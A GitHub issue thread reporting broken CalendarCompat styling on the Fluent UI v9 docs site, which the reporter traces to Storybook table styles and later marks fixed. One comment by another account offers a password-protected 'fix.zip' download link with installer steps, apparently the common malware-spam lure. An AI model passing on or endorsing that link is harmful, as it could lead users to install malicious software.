### ISSUE TITLE
[Bug]: CalendarCompat styles are broken

### ISSUE THREAD

**Issue by ValentinaKozlova** [microsoft/fluentui#32384]
### Library

React Components / v9 (@fluentui/react-components)

### System Info

```shell
System:
    OS: Windows 11 10.0.22631
    CPU: (8) x64 Intel(R) Core(TM) i7-1065G7 CPU @ 1.30GHz
    Memory: 10.49 GB / 31.60 GB
  Browsers:
    Edge: Chromium (127.0.2651.74)
    Internet Explorer: 11.0.22621.3527
```

### Are you reporting an Accessibility issue?

no

### Reproduction

https://react.fluentui.dev/?path=/docs/compat-components-calendar--docs

### Bug Description

Open CalendarCompat page: https://react.fluentui.dev/?path=/docs/compat-components-calendar--docs

## Actual Behavior
![image](https://github.com/user-attachments/assets/51fdfac5-fc1f-4ce3-840f-9b6ade5208ef)

## Expected Behavior
![image](https://github.com/user-attachments/assets/28563622-a630-4eaa-b04b-7b762cb72591)

### Requested priority

High

### Products/sites affected

CalendarCompat

### Are you willing to submit a PR to fix?

no

### Validations

- [X] Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
- [X] The provided reproduction is a minimal reproducible example of the bug.

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ValentinaKozlova** [comment]
Issue is caused by `#storybook-docs table:not(.docblock-argstable)` styles which apply to table tags

**Comment by ValentinaKozlova** [comment]
It was fixed with the last update of the doc site
